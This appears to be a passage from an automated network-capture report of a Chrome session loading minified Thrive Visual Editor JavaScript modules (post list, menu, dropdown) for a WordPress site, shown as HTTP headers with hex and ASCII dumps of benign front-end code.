                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC699INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 5b 22 70 6f 73 74 2d 6c 69 73 74 22 5d 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 70 6f 73 74 2d 6c 69 73 74 22 2c 21 31 29 2c 28 74 3d 3e 7b 69 66 28 21 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 70 6f 73 74 2d 6c 69 73 74 22 29 29 7b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 74 28 22 2e 74 63 62 2d 70 6f 73 74 2d 6c 69 73 74 22 29 2e 65 61 63 68 28 28 28 69 2c 73 29 3d 3e 7b 6e 65 77 20 65 28 74 28 73 29 29 2e 72 65 6e 64 65 72 50 61 67 69 6e 61 74 69 6f 6e 28 29 7d 29 29 7d 29 29 3b 63 6c 61
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules["post-list"]&&TCB_Front.setModuleLoadedStatus("post-list",!1),(t=>{if(!TCB_Front.isModuleLoaded("post-list")){t(window).on("tcb_after_dom_ready",(()=>{t(".tcb-post-list").each(((i,s)=>{new e(t(s)).renderPagination()}))}));cla
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 61 69 6e 65 72 22 29 3b 74 2e 61 74 74 72 28 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74 69 6e 67 73 22 2c 64 65 63 6f 64 65 55 52 49 28 74 2e 61 74 74 72 28 22 64 61 74 61 2d 63 61 72 6f 75 73 65 6c 2d 73 65 74 74 69 6e 67 73 22 29 29 29 2c 74 68 69 73 2e 63 61 72 6f 75 73 65 6c 3d 6e 65 77 20 54 43 42 5f 46 72 6f 6e 74 2e 43 61 72 6f 75 73 65 6c 28 74 68 69 73 29 2c 74 68 69 73 2e 63 61 72 6f 75 73 65 6c 2e 69 6e 69 74 43 61 72 6f 75 73 65 6c 28 29 7d 7d 67 65 74 50 61 67 69 6e 61 74 69 6f 6e 49 6e 73 74 61 6e 63 65 28 29 7b 69 66 28 74 68 69 73 2e 6c 69 73 74 41 72 67 73 26 26 74 68 69 73 2e 6c 69 73 74 41 72 67 73 2e 61 74 74 72 29 7b 63 6f 6e 73 74 20 74 3d 74 68 69 73 2e 6c 69 73 74 41 72 67 73 2e 61 74 74 72 5b 22 70 61 67 69 6e 61 74
                                                                                                                                                                                                                                                        Data Ascii: ainer");t.attr("data-carousel-settings",decodeURI(t.attr("data-carousel-settings"))),this.carousel=new TCB_Front.Carousel(this),this.carousel.initCarousel()}}getPaginationInstance(){if(this.listArgs&&this.listArgs.attr){const t=this.listArgs.attr["paginat
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 6d 70 6c 61 74 65 5b 64 61 74 61 2d 69 64 65 6e 74 69 66 69 65 72 3d 22 27 2b 74 68 69 73 2e 6c 69 73 74 41 72 67 73 2e 74 65 6d 70 6c 61 74 65 2b 27 22 5d 27 29 2e 68 74 6d 6c 28 29 29 29 7d 67 65 74 41 74 74 72 28 74 29 7b 72 65 74 75 72 6e 20 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 61 74 74 72 28 74 29 7d 67 65 74 49 74 65 6d 73 28 74 2c 65 3d 74 68 69 73 2e 6c 69 73 74 41 72 67 73 29 7b 54 43 42 5f 46 72 6f 6e 74 2e 55 74 69 6c 73 2e 72 65 73 74 41 6a 61 78 28 7b 72 6f 75 74 65 3a 74 76 65 5f 66 72 6f 6e 74 65 6e 64 5f 6f 70 74 69 6f 6e 73 2e 72 6f 75 74 65 73 2e 70 6f 73 74 73 2b 22 2f 68 74 6d 6c 22 2c 64 61 74 61 3a 7b 63 6f 6e 74 65 6e 74 3a 74 68 69 73 2e 63 6f 6e 74 65 6e 74 2c 61 72 67 73 3a 65 7d 7d 29 2e 64 6f 6e 65 28 28 65 3d 3e 7b 22
                                                                                                                                                                                                                                                        Data Ascii: emplate[data-identifier="'+this.listArgs.template+'"]').html()))}getAttr(t){return this.$element.attr(t)}getItems(t,e=this.listArgs){TCB_Front.Utils.restAjax({route:tve_frontend_options.routes.posts+"/html",data:{content:this.content,args:e}}).done((e=>{"
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC455INData Raw: 61 74 61 28 22 6d 61 73 6f 6e 72 79 22 29 29 7b 63 6f 6e 73 74 20 65 3d 74 2e 66 69 6e 64 28 60 24 7b 74 68 69 73 2e 6c 69 73 74 49 64 65 6e 74 69 66 69 65 72 7d 3a 6e 6f 74 28 2e 6d 61 73 6f 6e 72 79 2d 62 72 69 63 6b 29 60 29 3b 74 2e 6d 61 73 6f 6e 72 79 28 22 61 70 70 65 6e 64 65 64 22 2c 65 29 2c 74 2e 6d 61 73 6f 6e 72 79 28 22 6c 61 79 6f 75 74 22 29 7d 7d 69 6e 69 74 49 74 65 6d 73 28 29 7b 28 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 2e 74 63 62 2d 63 75 73 74 6f 6d 2d 66 69 65 6c 64 2d 73 6f 75 72 63 65 2e 74 68 72 76 2d 72 61 74 69 6e 67 22 29 2e 6c 65 6e 67 74 68 7c 7c 74 68 69 73 2e 24 65 6c 65 6d 65 6e 74 2e 66 69 6e 64 28 22 5b 64 61 74 61 2d 73 68 6f 72 74 63 6f 64 65 2d 69 64 2a 3d 27 61 63 66 5f 27 5d 22 29 2e 6c 65 6e
                                                                                                                                                                                                                                                        Data Ascii: ata("masonry")){const e=t.find(`${this.listIdentifier}:not(.masonry-brick)`);t.masonry("appended",e),t.masonry("layout")}}initItems(){(this.$element.find(".tcb-custom-field-source.thrv-rating").length||this.$element.find("[data-shortcode-id*='acf_']").len


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        67192.168.2.449821192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC621OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                        sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: cross-site
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: script
                                                                                                                                                                                                                                                        Referer: https://indyhumane.org/
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC666INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 15448
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/menu.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 1.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 1
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC703INData Raw: 28 28 29 3d 3e 7b 76 61 72 20 65 3d 7b 37 34 32 30 38 3a 65 3d 3e 7b 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2e 6d 65 6e 75 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 6d 65 6e 75 22 2c 21 31 29 2c 66 75 6e 63 74 69 6f 6e 28 74 2c 6e 29 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 6d 65 6e 75 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 6f 3d 65 3d 3e 5b 22 61 75 74 6f 22 2c 22 73 63 72 6f 6c 6c 22 2c 22 68 69 64 64 65 6e 22 5d 2e 69 6e 63 6c 75 64 65 73 28 65 2e 63 73 73 28 22 6f 76 65 72 66 6c 6f 77 22 29 29 3b 6c 65 74 20 69 3b 66 75 6e 63 74 69 6f 6e 20 73 28 65 29 7b 72 65 74 75 72 6e 20 74 28 65
                                                                                                                                                                                                                                                        Data Ascii: (()=>{var e={74208:e=>{void 0===TCB_Front.js_modules.menu&&TCB_Front.setModuleLoadedStatus("menu",!1),function(t,n){if(TCB_Front.isModuleLoaded("menu"))return;const o=e=>["auto","scroll","hidden"].includes(e.css("overflow"));let i;function s(e){return t(e
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 73 28 6f 29 3b 73 7c 7c 6e 2e 73 74 79 6c 65 2e 73 65 74 50 72 6f 70 65 72 74 79 28 22 64 69 73 70 6c 61 79 22 2c 22 6e 6f 6e 65 22 2c 22 69 6d 70 6f 72 74 61 6e 74 22 29 2c 69 2e 74 6f 67 67 6c 65 28 73 29 7d 29 29 7d 2c 68 61 73 56 69 73 69 62 6c 65 49 74 65 6d 73 28 65 29 7b 6c 65 74 20 74 3d 21 31 3b 72 65 74 75 72 6e 20 65 2e 66 69 6e 64 28 22 3e 20 6c 69 22 29 2e 65 61 63 68 28 28 28 65 2c 6e 29 3d 3e 7b 67 65 74 43 6f 6d 70 75 74 65 64 53 74 79 6c 65 28 6e 29 2e 67 65 74 50 72 6f 70 65 72 74 79 56 61 6c 75 65 28 22 64 69 73 70 6c 61 79 22 29 2e 69 6e 63 6c 75 64 65 73 28 22 6e 6f 6e 65 22 29 7c 7c 28 74 3d 21 30 29 7d 29 29 2c 74 7d 2c 7a 49 6e 64 65 78 4f 72 64 65 72 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 22 75 6c 2e 74 76 65 5f 77 5f 6d 65 6e 75
                                                                                                                                                                                                                                                        Data Ascii: s(o);s||n.style.setProperty("display","none","important"),i.toggle(s)}))},hasVisibleItems(e){let t=!1;return e.find("> li").each(((e,n)=>{getComputedStyle(n).getPropertyValue("display").includes("none")||(t=!0)})),t},zIndexOrder(){const e=t("ul.tve_w_menu
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 63 6b 65 64 22 29 2e 6f 6e 28 22 6d 65 6e 75 5f 69 74 65 6d 5f 61 6e 63 68 6f 72 5f 63 6c 69 63 6b 65 64 22 2c 22 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 22 2c 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29 3b 61 2e 69 73 48 61 6d 62 75 72 67 65 72 28 65 29 26 26 72 65 71 75 65 73 74 41 6e 69 6d 61 74 69 6f 6e 46 72 61 6d 65 28 28 28 29 3d 3e 7b 61 2e 74 6f 67 67 6c 65 53 74 61 74 65 28 65 2c 21 31 29 7d 29 29 7d 29 29 2c 65 2e 6f 66 66 28 22 63 6c 69 63 6b 2e 6d 65 6e 75 5f 69 74 65 6d 5f 63 6c 69 63 6b 22 29 2e 6f 6e 28 22 63 6c 69 63 6b 2e 6d 65 6e 75 5f 69 74 65 6d 5f 63 6c 69 63 6b 22 2c 22 2e 74 76 65 5f 77 5f 6d 65 6e 75 20 6c 69 3a 6e 6f 74 28 2e 74 76 65 2d 72 65 67 75 6c 61 72 20 2e 74 63 62 2d 6d 65 67 61 2d
                                                                                                                                                                                                                                                        Data Ascii: cked").on("menu_item_anchor_clicked",".tve_w_menu li",(function(){const e=t(this);a.isHamburger(e)&&requestAnimationFrame((()=>{a.toggleState(e,!1)}))})),e.off("click.menu_item_click").on("click.menu_item_click",".tve_w_menu li:not(.tve-regular .tcb-mega-
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 74 75 72 6e 21 31 7d 69 66 28 63 26 26 64 29 72 65 74 75 72 6e 21 31 3b 63 6f 6e 73 74 20 6d 3d 6e 2e 63 68 69 6c 64 72 65 6e 28 22 2e 74 76 65 5f 65 74 5f 63 6c 69 63 6b 22 29 3b 72 65 74 75 72 6e 20 6d 2e 6c 65 6e 67 74 68 3e 30 3f 28 6d 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 21 30 29 3a 21 21 72 2e 61 74 74 72 28 22 68 72 65 66 22 29 26 26 28 72 2e 68 61 73 43 6c 61 73 73 28 22 74 76 65 2d 6a 75 6d 70 2d 73 63 72 6f 6c 6c 22 29 3f 28 72 2e 74 72 69 67 67 65 72 28 22 63 6c 69 63 6b 22 29 2c 21 30 29 3a 28 73 28 72 2c 65 29 2c 76 6f 69 64 28 61 2e 69 73 48 61 6d 62 75 72 67 65 72 28 6e 29 26 26 6c 2e 70 61 74 68 6e 61 6d 65 3d 3d 3d 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 70 61 74 68 6e 61 6d 65 26 26 6c 2e 68 6f 73 74 3d 3d 3d 77
                                                                                                                                                                                                                                                        Data Ascii: turn!1}if(c&&d)return!1;const m=n.children(".tve_et_click");return m.length>0?(m.trigger("click"),!0):!!r.attr("href")&&(r.hasClass("tve-jump-scroll")?(r.trigger("click"),!0):(s(r,e),void(a.isHamburger(n)&&l.pathname===window.location.pathname&&l.host===w
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 52 65 73 70 6f 6e 73 69 76 65 54 6f 67 67 6c 65 28 29 7b 22 6d 6f 62 69 6c 65 22 3d 3d 3d 6e 2e 67 65 74 44 69 73 70 6c 61 79 54 79 70 65 28 29 3f 28 6e 2e 24 62 6f 64 79 2e 66 69 6e 64 28 22 2e 76 6d 64 2d 72 69 67 68 74 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 74 6f 67 67 6c 65 2d 64 69 72 22 2c 22 76 6d 64 2d 72 69 67 68 74 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 76 6d 64 2d 72 69 67 68 74 22 29 2e 61 64 64 43 6c 61 73 73 28 22 76 6d 64 2d 74 6f 67 67 6c 65 22 29 2c 6e 2e 24 62 6f 64 79 2e 66 69 6e 64 28 22 2e 76 6d 64 2d 6c 65 66 74 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 74 6f 67 67 6c 65 2d 64 69 72 22 2c 22 76 6d 64 2d 6c 65 66 74 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 76 6d 64 2d 6c 65 66 74 22 29 2e 61 64 64 43 6c 61 73 73 28
                                                                                                                                                                                                                                                        Data Ascii: ResponsiveToggle(){"mobile"===n.getDisplayType()?(n.$body.find(".vmd-right").attr("data-toggle-dir","vmd-right").removeClass("vmd-right").addClass("vmd-toggle"),n.$body.find(".vmd-left").attr("data-toggle-dir","vmd-left").removeClass("vmd-left").addClass(
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 29 2c 74 28 22 2e 74 76 65 2d 6d 2d 74 72 69 67 67 65 72 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29 2e 70 61 72 65 6e 74 28 29 2e 66 69 6e 64 28 22 3e 20 75 6c 22 29 3b 69 66 28 21 65 2e 64 61 74 61 28 22 74 76 65 2d 63 6f 6c 6f 72 73 2d 61 64 64 65 64 22 29 26 26 65 2e 66 69 6e 64 28 22 3e 20 6c 69 20 3e 20 61 22 29 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 2d 63 6f 6c 6f 72 22 29 29 7b 63 6f 6e 73 74 20 74 3d 65 2e 66 69 6e 64 28 22 3e 20 6c 69 20 3e 20 61 22 29 2c 6e 3d 74 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 2d 63 6f 6c 6f 72 22 29 3b 74 2e 61 74 74 72 28 22 64 61 74 61 2d 74 76 65 2d 63 75 73 74 6f 6d 2d
                                                                                                                                                                                                                                                        Data Ascii: .removeClass("tve-m-expanded"),t(".tve-m-trigger").each((function(){const e=t(this).parent().find("> ul");if(!e.data("tve-colors-added")&&e.find("> li > a").attr("data-o-color")){const t=e.find("> li > a"),n=t.attr("data-o-color");t.attr("data-tve-custom-
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 29 2c 75 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 73 74 79 6c 65 22 29 2c 73 65 74 54 69 6d 65 6f 75 74 28 28 28 29 3d 3e 6e 2e 66 69 6e 64 28 22 2e 74 63 62 2d 6d 61 73 6f 6e 72 79 22 29 2e 6d 61 73 6f 6e 72 79 28 29 29 2c 31 65 33 29 3b 65 6c 73 65 7b 69 66 28 61 2e 65 6e 73 75 72 65 48 61 6d 62 75 72 67 65 72 4c 6f 67 6f 53 70 6c 69 74 28 6e 29 2c 6e 2e 66 69 6e 64 28 22 2e 74 63 62 2d 6d 61 73 6f 6e 72 79 22 29 2e 65 61 63 68 28 28 66 75 6e 63 74 69 6f 6e 28 29 7b 63 6f 6e 73 74 20 65 3d 74 28 74 68 69 73 29 3b 65 2e 64 61 74 61 28 22 6d 61 73 6f 6e 72 79 22 29 26 26 65 2e 6d 61 73 6f 6e
                                                                                                                                                                                                                                                        Data Ascii: ),n.find(".tve-m-expanded").removeClass("tve-m-expanded"),u.removeAttr("style"),setTimeout((()=>n.find(".tcb-masonry").masonry()),1e3);else{if(a.ensureHamburgerLogoSplit(n),n.find(".tcb-masonry").each((function(){const e=t(this);e.data("masonry")&&e.mason
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 2e 68 61 73 43 6c 61 73 73 28 22 63 6c 6f 73 65 2d 6f 66 66 73 63 72 65 65 6e 2d 69 63 6f 6e 2d 61 76 61 69 6c 61 62 6c 65 22 29 7c 7c 65 2e 61 70 70 65 6e 64 28 65 2e 66 69 6e 64 28 22 2e 74 63 62 2d 69 63 6f 6e 2d 63 6c 6f 73 65 22 29 2e 63 6c 6f 6e 65 28 29 2e 72 65 6d 6f 76 65 43 6c 61 73 73 28 22 74 63 62 2d 69 63 6f 6e 2d 63 6c 6f 73 65 22 29 2e 61 64 64 43 6c 61 73 73 28 22 74 63 62 2d 69 63 6f 6e 2d 63 6c 6f 73 65 2d 6f 66 66 73 63 72 65 65 6e 22 29 29 2e 61 64 64 43 6c 61 73 73 28 22 63 6c 6f 73 65 2d 6f 66 66 73 63 72 65 65 6e 2d 69 63 6f 6e 2d 61 76 61 69 6c 61 62 6c 65 20 22 29 7d 72 65 74 75 72 6e 20 6c 2e 74 6f 67 67 6c 65 43 6c 61 73 73 28 22 74 76 65 2d 6d 2d 65 78 70 61 6e 64 65 64 22 2c 74 29 2e 72 65 6d 6f 76 65 41 74 74 72 28 22 73 74
                                                                                                                                                                                                                                                        Data Ascii: .hasClass("close-offscreen-icon-available")||e.append(e.find(".tcb-icon-close").clone().removeClass("tcb-icon-close").addClass("tcb-icon-close-offscreen")).addClass("close-offscreen-icon-available ")}return l.toggleClass("tve-m-expanded",t).removeAttr("st
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 65 49 6e 74 28 65 2e 61 74 74 72 28 22 64 61 74 61 2d 6f 66 66 73 63 72 65 65 6e 2d 77 69 64 74 68 2d 73 65 74 75 70 22 29 29 29 7b 6c 65 74 20 65 3d 74 2e 63 73 73 28 22 6d 61 78 2d 77 69 64 74 68 22 29 3b 28 65 2e 69 6e 63 6c 75 64 65 73 28 22 25 22 29 7c 7c 22 6e 6f 6e 65 22 3d 3d 3d 65 29 26 26 28 65 3d 74 2e 6f 75 74 65 72 57 69 64 74 68 28 29 29 2c 6f 3d 4d 61 74 68 2e 6d 69 6e 28 6f 2c 70 61 72 73 65 49 6e 74 28 65 29 29 7d 63 3d 60 6c 65 66 74 3a 20 24 7b 70 61 72 73 65 49 6e 74 28 72 2e 6c 65 66 74 2d 6c 2e 6c 65 66 74 2d 6f 2f 32 2b 61 2e 6f 75 74 65 72 57 69 64 74 68 28 29 2f 32 29 7d 70 78 3b 72 69 67 68 74 3a 75 6e 73 65 74 3b 60 7d 72 65 74 75 72 6e 20 63 7d 2c 67 65 74 4d 65 6e 75 50 6f 73 69 74 69 6f 6e 61 6c 50 61 72 65 6e 74 3a 65 3d 3e
                                                                                                                                                                                                                                                        Data Ascii: eInt(e.attr("data-offscreen-width-setup"))){let e=t.css("max-width");(e.includes("%")||"none"===e)&&(e=t.outerWidth()),o=Math.min(o,parseInt(e))}c=`left: ${parseInt(r.left-l.left-o/2+a.outerWidth()/2)}px;right:unset;`}return c},getMenuPositionalParent:e=>
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC1369INData Raw: 28 29 2e 6c 65 6e 67 74 68 29 7b 6f 2e 66 69 6e 64 28 22 2e 74 63 62 2d 68 61 6d 62 75 72 67 65 72 2d 6c 6f 67 6f 22 29 2e 72 65 6d 6f 76 65 28 29 3b 63 6f 6e 73 74 20 65 3d 74 28 27 3c 64 69 76 20 63 6c 61 73 73 3d 22 74 63 62 2d 68 61 6d 62 75 72 67 65 72 2d 6c 6f 67 6f 22 3e 3c 2f 64 69 76 3e 27 29 3b 65 2e 61 70 70 65 6e 64 28 6e 2e 63 68 69 6c 64 72 65 6e 28 29 29 2c 6f 2e 66 69 6e 64 28 22 2e 74 68 72 69 76 65 2d 73 68 6f 72 74 63 6f 64 65 2d 68 74 6d 6c 22 29 2e 70 72 65 70 65 6e 64 28 65 29 7d 7d 2c 65 6e 73 75 72 65 52 65 67 75 6c 61 72 4c 6f 67 6f 53 70 6c 69 74 28 65 29 7b 63 6f 6e 73 74 20 74 3d 73 28 65 29 2c 6e 3d 74 2e 66 69 6e 64 28 22 2e 74 63 62 2d 68 61 6d 62 75 72 67 65 72 2d 6c 6f 67 6f 20 2e 74 63 62 2d 6c 6f 67 6f 22 29 2c 6f 3d 74
                                                                                                                                                                                                                                                        Data Ascii: ().length){o.find(".tcb-hamburger-logo").remove();const e=t('<div class="tcb-hamburger-logo"></div>');e.append(n.children()),o.find(".thrive-shortcode-html").prepend(e)}},ensureRegularLogoSplit(e){const t=s(e),n=t.find(".tcb-hamburger-logo .tcb-logo"),o=t


                                                                                                                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                        68192.168.2.449820192.0.77.394432044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC451OUTGET /wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js?v=10.4.2&ver=10.4.2 HTTP/1.1
                                                                                                                                                                                                                                                        Host: 149955744.v2.pressablecdn.com
                                                                                                                                                                                                                                                        Connection: keep-alive
                                                                                                                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                        Accept: */*
                                                                                                                                                                                                                                                        Sec-Fetch-Site: none
                                                                                                                                                                                                                                                        Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                        Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                        Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                        Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC669INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                        Server: nginx
                                                                                                                                                                                                                                                        Date: Thu, 09 Jan 2025 01:59:13 GMT
                                                                                                                                                                                                                                                        Content-Type: application/javascript
                                                                                                                                                                                                                                                        Content-Length: 4909
                                                                                                                                                                                                                                                        Connection: close
                                                                                                                                                                                                                                                        Link: <http://indyhumane.org/wp-content/plugins/thrive-visual-editor/editor/js/dist/modules/dropdown.min.js>; rel="canonical"
                                                                                                                                                                                                                                                        Last-Modified: Sun, 15 Dec 2024 01:15:24 GMT
                                                                                                                                                                                                                                                        Vary: Accept-Encoding
                                                                                                                                                                                                                                                        Expires: Thu, 31 Dec 2037 23:55:55 GMT
                                                                                                                                                                                                                                                        Cache-Control: max-age=315360000
                                                                                                                                                                                                                                                        Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                        Access-Control-Allow-Methods: GET, HEAD
                                                                                                                                                                                                                                                        X-ac: 2.jfk _atomic_dca MISS
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        Strict-Transport-Security: max-age=15552000
                                                                                                                                                                                                                                                        Alt-Svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                        X-nc: MISS jfk 2
                                                                                                                                                                                                                                                        Accept-Ranges: bytes
                                                                                                                                                                                                                                                        2025-01-09 01:59:13 UTC700INData Raw: 76 6f 69 64 20 30 3d 3d 3d 54 43 42 5f 46 72 6f 6e 74 2e 6a 73 5f 6d 6f 64 75 6c 65 73 2e 64 72 6f 70 64 6f 77 6e 26 26 54 43 42 5f 46 72 6f 6e 74 2e 73 65 74 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 53 74 61 74 75 73 28 22 64 72 6f 70 64 6f 77 6e 22 2c 21 31 29 2c 28 74 3d 3e 7b 69 66 28 54 43 42 5f 46 72 6f 6e 74 2e 69 73 4d 6f 64 75 6c 65 4c 6f 61 64 65 64 28 22 64 72 6f 70 64 6f 77 6e 22 29 29 72 65 74 75 72 6e 3b 63 6f 6e 73 74 20 65 3d 22 2e 74 76 65 5f 6c 67 5f 64 72 6f 70 64 6f 77 6e 2c 20 2e 74 63 62 2d 66 6f 72 6d 2d 64 72 6f 70 64 6f 77 6e 2c 20 2e 74 76 65 2d 64 79 6e 61 6d 69 63 2d 64 72 6f 70 64 6f 77 6e 22 3b 74 28 77 69 6e 64 6f 77 29 2e 6f 6e 28 22 74 63 62 5f 61 66 74 65 72 5f 64 6f 6d 5f 72 65 61 64 79 22 2c 28 28 29 3d 3e 7b 69 66 28 21 54
                                                                                                                                                                                                                                                        Data Ascii: void 0===TCB_Front.js_modules.dropdown&&TCB_Front.setModuleLoadedStatus("dropdown",!1),(t=>{if(TCB_Front.isModuleLoaded("dropdown"))return;const e=".tve_lg_dropdown, .tcb-form-dropdown, .tve-dynamic-dropdown";t(window).on("tcb_after_dom_ready",(()=>{if(!T
